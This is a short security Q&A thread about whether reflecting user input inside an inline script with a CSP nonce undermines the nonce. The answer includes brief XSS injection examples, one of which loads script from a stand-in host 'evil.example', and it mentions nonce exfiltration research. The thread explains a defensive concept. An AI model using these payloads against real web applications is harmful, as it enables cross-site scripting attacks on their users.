I stumbled upon a web app which is accepting user input and putting it into a variable within script tag.
The script tag does have a nonce attribute.
As am working on bypassing the XSS filter, I had this thought that this practice of reflecting user input within an inline script with nonce attribute beats the purpose of using it.
Is my understand correct or am I missing something here ?
reflecting user input within an inline script with nonce attribute beats the purpose of using it.
That depends on the type of injection you achieve.
If you manage to construct an XSS vector that stays within the nonce'd script tag, you're right, it's useless. You can just inject additional script code via e.g. "; alert(); //.
But if you're forced to close the script tag (say, because <, > are allowed but " is not) via e.g. </script><script src=evil.example>..., then the CSP works out, because you can't successfully inject new scripts without knowing the correct nonce.
Note that in the past, nonce exfiltration techniques and other nonce-related browser bugs have come up that may have rendered the second case exploitable, too. Have a look at this talk by Spagnuolo/Weichselbaum.
